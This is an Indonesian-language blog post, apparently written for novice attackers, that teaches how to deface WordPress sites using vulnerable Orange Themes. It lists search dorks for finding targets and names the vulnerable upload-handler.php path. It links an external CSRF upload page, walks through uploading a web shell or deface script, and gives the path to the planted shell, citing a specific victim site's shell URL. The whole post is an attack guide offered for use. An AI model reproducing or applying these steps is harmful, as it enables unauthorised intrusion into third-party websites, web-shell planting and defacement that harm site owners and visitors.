» » » Cara Deface WP Orange Themes
,

Cara Deface WP Orange Themes

Hallo guys. kali ini gw mau share Tutorial cara Deface metode WP Orange Themes, maybe bagi mastah2 ini exploit basi :3 tp gpp la kasian kan kalo yg newbeh kek w g tau cara nya. ok langsung sj.


Bahan :
-Dork :
     inurl:"/wp-content/themes/agritourismo-theme/

     inurl:"/wp-content/themes/bordeaux-theme/

     inurl:"/wp-content/themes/bulteno-theme/

     inurl:"/wp-content/themes/oxygen-theme/

     inurl:"/wp-content/themes/radial-theme/

     inurl:"/wp-content/themes/rayoflight-theme/

     inurl:"/wp-content/themes/reganto-theme/

     inurl:"/wp-content/themes/rockstar-theme/

(kembangin lg bossku biar dpt yg perawan h3h3)
-Exploit :  /wp-content/themes/bordeaux-theme/functions/upload-handler.php
-CSRF by ACE666X http://kedareddy.com/b.php
-KOPI & ROKOK :v


Caranya :
pertama-tama ya dorking dulu lach :v
1
cari target kemudian tambahkan exploitnya
contoh : target.com/wp-content/themes/bordeaux-theme/functions/upload-handler.php
Vuln = "error" seperti dibawah ini
1
contoh web vuln
Lalu kalian buka CSRF diatas, dan liat contoh dibawah
URL = (masukin target kalian disini)
Postfile = orange_themes
1

Lalu Klik 'Jepit!1!11', nnti akan muncul tempat upload lalu pilih shell/script deface klean Terus klik 'Cr00t!', kalo succes akan muncul nama file klean
1
Akses Shell : /wp-content/uploads/tahun/bulan/namafile.php
Contoh : http://www.erwinspleintje.nl/wp-content/uploads/2018/05/1525878701asu.php
NB : Kalo muncul tulisan "No PHP" coba upload script deface sj
Share on Facebook
Share on Twitter
Share on Google+
Share on LinkedIn

Subscribe to receive free email updates:

0 Response to "Cara Deface WP Orange Themes"

Post a Comment

Subscribe to: Post Comments (Atom)